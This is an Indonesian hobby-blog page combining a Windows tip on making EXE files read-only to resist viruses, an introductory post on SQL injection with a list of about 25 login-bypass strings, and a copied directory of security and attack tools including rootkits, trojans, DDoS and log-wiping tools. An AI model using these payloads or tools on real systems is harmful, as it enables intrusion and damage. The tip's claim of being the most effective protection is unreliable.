                  Cara ini adalah untuk mencegah virus merusak file system kita yang biasanya berakhiran EXE, dan Sebelum anda melakukan hal ini, anda harus terlebih dahulu membackup system windows anda (baca keterangan no 1 di atas), karena penulis takut anda melakukan kesalahan yang dapat berakibat fatal terhadap system anda. Anda juga harus mempunyai dasar Windows untuk melakukan ini, kalau tidak, anda akan bingung dan kesulitan untuk memahaminya.

                 Caranya cukup mudah, anda tinggal merubah attribut dari file EXE anda menjadi READ ONLY alias cuma bisa dibaca, tidak bisa ditulis. caranya bisa anda menggunakan SEARCH dari windows anda, kemudian cari semua program yang ber-ektenstion EXE (search key-nya *.exe) di folder windows. Setelah itu blok semua program yang tampil (atau tekan ctrl+a) terus klik kanan pilih properties. Setelah itu pilih READ-ONLY di bagian bawah kotak pilihan atributes. Bagi yang tahu DOS (command prompt) bisa menggunakan perintah ATTRIB, fungsinya sama saja dengan cara di atas. contoh: c:\windows>attrib +r *.exe

                Hal ini akan mencegah virus untuk merubah atau merusak file-file tersebut, karena pilihan tadi mematikan fitur untuk merubah file-file tersebut. Kalau anda ingin lebih yakin virus bisa mendeteksi hal tersebut, anda bisa tambahkan pilihan HIDDEN (menyembunyikan file tersebut) di sebelah kanan dari READ ONLY. Dengan kedua pilihan tersebut virus-virus pada umumnya tidak akan dapat menginfeksi file tersebut. Kalau anda ingin menampakan file HIDDEN ketika membuka folder di komputer anda, anda bisa pilih "show all hidden files" di "folder option".

                Anda juga bisa melakukan hal di atas ke semua folder komputer anda, kalau anda merasa hal ini perlu dilakukan, atau mungkin dilakukan juga ke file lain yang bukan ber-ekstensi EXE atau COM. Cara ini adalah cara yang paling efektif dan telah diuji coba oleh penulis. Satu hal yang penting diketahui, kalau anda ingin melakukan penghapusan atau perubahaan ataupun anda sering meng-update file yang ber-ekstensi EXE tersebut, anda harus ingat untuk membuka proteksi read-only atau hidden tersebut. Kalau tidak file tersebut tidak akan bisa dihapus atau diupdate, dan akan muncul pesan error.

                Ini adalah salah satu cara untuk memproteksi file, cara lainnya dan cara Untuk mengetahui cara virus merusak/merubah file, membasmi atau menghapus virus secara manual, akan penulis bahas di kesempatan lain. 

    <<< Semoga BermanFaat >>> 

    Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

                  Konsep dasar SQL Injection | wah ini postingan pertama ane ni tentang hacking. bagi para mastah mohon koreksi ntambahanya.

                SQL singkatan dari Structured Query Language yg merupakan bahasa komputer standar yg ditetapkan oleh ANSI (American National Standard Institute) untuk mengakses dan memanupulasi sistem database. SQL bekerja dgn program2 database seperti MS Access, DB 2, Informix, MS SQL Server, Oracle, Sybase dan lain sebagainya.

               SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yg berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman (scripting) pada SQL dalam mengolah suatu sistem database. Hasil yg ditimbulkan dari teknik ini membawa masalah yg sangat serius. Mengapa disebut SQL Injection ? seperti yg kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu “suntikan”. Yang terjadi memang seperti melakukan suntikan terhadap SQL yg tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.

               Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman (scripting) pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yg terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yg dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.

              Keuntungan yg diambil adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya. 

               Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :

    SQLQuery=”SELECT Username FROM Users WHERE Username=”’&strUsername&”’strpassword&”’

               Pada verifikasi terdapat kelemahan pada pemprosesan pada string2 tertentu yg sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan.


    Contoh : menggunakan injection string ’OR’’= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :

    SELECT Username FROM Users WHERE Username=’’OR’’=’’ AND Password=’’OR’’=’’

    Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.

    Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :

    ’or 1=1–
    ’or 0=0 –
    ’or ’x’=’x
    ’or a=a-
    “or 0=0 –
    “or 0=0 #
    “or “x”=”x
    “)or(”a”=”a
    admin’–
    hi” or 1=1 –
    hi’ or’a’=’a
    hi”)or(”a”=”a
    or 0=0 #
    ’or a=a–
    ’or 0=0 #
    ’having 1=1–
    “or 1=1–
    “or “a”=”a
    ’)or(’a’=’a
    ’)or(’x’=’x
    hi” or “a”=”a
    hi’ or 1=1 –
    hi’)or(’a’=’a
    or 0=0 –
    or 1=1–
                Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang.

                 Sql Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat bertanya sama mbah google


    <<<Semoga Bermanfaat>>>

     Kumpulan Tools
    Tool Location Function
    Achilles Edit HTTP sessions
    Adig http://nscan.hypermart.net/index.cgi?index=dns Advanced dig for Windows
    Adore

    http://www.packetstormsecurity.com/UNIX/penetration/rootkits
    Kernel level rootkits
    AppScan http://www.sanctuminc.com
    Web site scanner (commercial)
    Authforce http://kapheine.hypa.net/authforce/index.php
    Attempts to guess passwords for HTTP
    Back Orifice 2000

    http://www.bo2k.com
    Remote control trojan program
    Brute_ssl http://www.packetstormsecurity.com/Exploit_Code_Archive/brute_ssl.c
    Guesses passwords for SSL
    Brute_web http://www.packetstormsecurity.com/Exploit_Code_Archive/brute_web.c Guesses passwords for the web
    Cheops

    http://www.marko.net/cheops/
    ICMP mapping tool
    Chkrootkit ftp://ftp.pangeia.com.br/pub/seg/pac Checks for rootkits on systems
    Covert_TCP

    http://www.packetstormsecurity.com
    Hiding data in the TCP/IP headers
    CPU Hog Local DOS attack
    Crack Unix password cracking
    Default passwords http://security.nerdnet.com Default passwords for many platforms
    Dsniff
    http://www.monkey.org/~dugsong/dsniff
    Advanced sniffer suite
    DumpSec
    http://www.systemtools.com/somarsoft
    Gathers data through Null session
    Enum
    http://razor.bindview.com
    Gathers data through Null session
    Ethereal http://www.ethereal.com Freeware sniffer for NT and Unix
    Fast Lane http://www.fastlanetech.com NT password filtering tool
    Firewalk Determines rules for a firewall
    Fragrouter Fragments IP packets
    GetAdmin
    http://www.infowar.co.uk/mnemonix/utils.htm
    Elevates access on NT
    Hunt Session Hijacking tool
    Hypnopaedia http://www.packetstormsecurity.com/Crackers/hypno.zip Guesses POP3 email passwords
    IIS Unicode IIS exploit
    IMAP Buffer Overflow
    http://www.packetstormsecurity.com
    Buffer overflow to gainroot access
    IP Watcher
    http://www.engarde.com
    Commercial session hijacking tool
    ITS4 Automated security reviewer
    Jizz
    http://www.rootshell.com
    DNS cache poisoning
    John the ripper

    http://www.openwall.com/john
    Password cracker formulti OS's
    Jolt2
    http://razor.bindview.com
    Denial of service tool
    Juggernaut
    http://www.rootshell.com
    Session hijcaking tool
    Knark
    http://www.packetstormsecurity.com/UNIX/penetration/rootkits
    Kernel level rootkit
    Land
    http://www.packetstormsecurity.com/9901-exploits/eugenics.pl
    Denial of service attack
    Linux boot disk http://home.eunet.no/~pnordah/ntpasswd/bootdisk.html Linux boot disk for NT
    Loki
    http://www.phrack.com/Archives/phrack51.tgz
    Creates a covertchannel
    L0phtcrack (LC) http://www.atstake.com Password cracker for NT/2000
    Log files ftp://ftp.technotronic.com/unix/log-tools Tools for editing log files
    Lrk5
    http://www.packetstormsecurity.com/UNIX/penetration/rootkits
    Rootkit
    Mendex http://www.packetstormsecurity.com Exploits trust relationship
    Nessus
    http://www.nessus.org
    Vulnerability scanner
    NetBus
    http://www.netbus.org
    Trojan program for NT
    NetCat
    http://www.l0pht.com/users/10pht/nc110.tgz
    Listen and connects to ports
    NetMeeting Buffer Overflow

    http://www.packetstormsecurity.com
    Buffer overflow for netmeeting
    Nmap
    http://www.insecure.org/nmap
    Port scanner
    NTFSDOS http://www.packetstormsecurity.com/NT/hack/ntfsdos.zip Allows DOS to read anNTFS partition
    NT Rootkit
    http://www.rootkit.com
    Rootkit for NT
    PalmCrack http://www.noncon.org/noncon/download.html Password cracker forpalmpilot
    Pandora http://www.nmrc.org/pandora Password cracker for Novell
    Password Guardian http://www.georgiasoftworks.com NT password filtering tool
    Ping of death
    http://www.packetstormsecurity.com
    Denial of service attack
    Ports http://www.simovits.com/nyheter9902.html List of common trojan ports
    Pwdump3 http://www.ebiz-tech.com/pwdump3 Dumps passwords from NT and 2000
    Queso
    http://www.apostols.org/projectz/queso
    OS fingerprinting
    Rbone http://www.packetstormsecurity.com Exploits trust relationship
    RDS exploit
    http://www.wiretrip.net/rfp/p/doc.asp?id=1&iface=2
    Gains access on an IIS server
    RedButton

    http://packetstorm.securify.com
    Acquires information from an NT system
    Redir
    http://oh.verio.com/~sammy/hacks
    Packet redirector
    Reverse WWW shell Covert channel
    Rstatd
    http://www.packetstormsecurity.com
    Buffer overflow
    Rootkits

    http://www.packetstormsecurity.com/UNIX/penetration/rootkits
    Rootkits
    Sam Spade
    http://www.samspade.org
    General reconnaissance tool
    Sechole
    http://www.ntshop.net
    Elevation of privileges
    Silk Rope http://www.netninja.com/bo/index.html Wrapper programs for creating trojans
    Slint http://www.l0pht.com/slint.html Source code security check
    Smurf
    http://www.packetstormsecurity.com
    Denial of service attack
    Smurf amplifier http://www.netscan.org List of smurf amplifiers
    Smurf amplifier http://www.pulltheplug.com/broadcast2.html List of smurf amplifiers
    Smurf defenses http://www.pentics.net/denial-of-service/white-papers/smurf.cgi Defending against the smurf attack
    Sneakin
    http://www.packetstormsecurity.com
    Reverse telnet covert channel
    Sniffit
    http://reptile.rug.ac.be/~coder/sniffit/sniffit.html
    Sniffer
    Snort http://www.snort.org IDS/sniffer
    Solaris rootkit
    http://thc.inferno.tusculum.edu/files/thc/slkm-1.0.html
    Solaris rootkit
    Somarsoft http://www.packetstormsecurity.com/NT/audit/nt.remotely.crack.nt.passwords.zip Remotely guesses NT passwords
    SSPing
    http://www.packetstormsecurity.com
    Denial of service attack
    StackGuard http://www.angelfire.com/sk/stackshield Creates more secure stacks
    Strongpass http://ntsecurity.nu/toolbox
    NT password filtering
    SYN Flood
    http://www.packetstormsecurity.com
    Denial of service attack
    Targa Denial of service tool
    TBA
    http://www.l0pht.com/~kingpin/pilot.html
    War dialer for a palm pilot
    THC War dialer
    THC Login Hacker
    http://thc.inferno.tusculum.edu
    War dialer scripting language
    Tini

    http://ntsecurity.nu/toolbox/tini
    Backdoor listener
    Tooltalk buffer overflow
    http://www.securityfocus.com
    Buffer overflow for gaining root access
    TFN2K
    http://www.packetstormsecurity.com/distributed/
    DDOS tool
    Trinoo DDOS tool
    Tripwire http://www.tripwire.com File integrity checker
    TTY watcher
    ftp://coast.cs.purdue.edu/pub/tools/unix/ttywatcher
    Session hijacking tool
    Web-based reconnaissance http://nettool.false.net Web-based  reconnaissance
    Web-based reconnaissance http://members.tripod.com/mixtersecurity/evil.html Web-based reconnaissance
    Web-based reconnaissance http://www.network-tools.com Web-based reconnaissance
    Web-based reconnaissance http://www.cotse.com/refs.htm Web-based reconnaissance
    Web-based reconnaissance http://sucideZnetfarmers.net Web-based
    econnaissance
    Web-based
    reconnaissance
    http://www.jtan.com/resources/winnuke.html


    Web-based reconnaissance
    Web-based reconnaissance http://www.securityspace.com Web-based reconnaissance
    Web-based
    reconnaissance
    http://crypto.yashy.com Web-based reconnaissance
    Web-based
    reconnaissance
    http://www.grc.com/x/ne.dll?bh0bkyd2 Web-based reconnaissance
    Web-based reconnaissance http://privacy.net/analyze Web-based reconnaissance
    Web-based
    reconnaissance
    http://www.webtrends.net/tools/security/scan.asp Web-based reconnaissance
    Web-based
    reconnaissance
    http://www.doshelp.com/dostest.htm Web-based reconnaissance
    Web-based reconnaissance http://www.dslreports.com/r3/dsl/secureme
    Web-based reconnaissance
    Whisker
    http://www.wiretrip.net/rfp

    CGI vulnerability scanner
    Windump

    http://netgroup-serv.polito.it/windump
    TCP dump for Windows
    Winnuke
    http://www.anticode.com
    DOS for Windows
    Winzapper
    http://ntsecurity.nu/toolbox/winzapper
    NT log editing tool
    World Wide Web
    Security FAQ
    http://www.w3.org/Security/Faq/www-security-faq.html World Wide Web security FAQ
    Xavier http://www.btinternet.com/~lithiumsoft Guesses application passwords
    Zombie Zapper http://razor.bindview.com/tools/ZombieZapper_form.shtml Puts DDOS zombies to sleep


    Source: http://www.securityhaven.com/tools.html

    Newbie Sejati ©2010 All rights reserved.
    Design Template By Johan Jm
    Powered by Blogger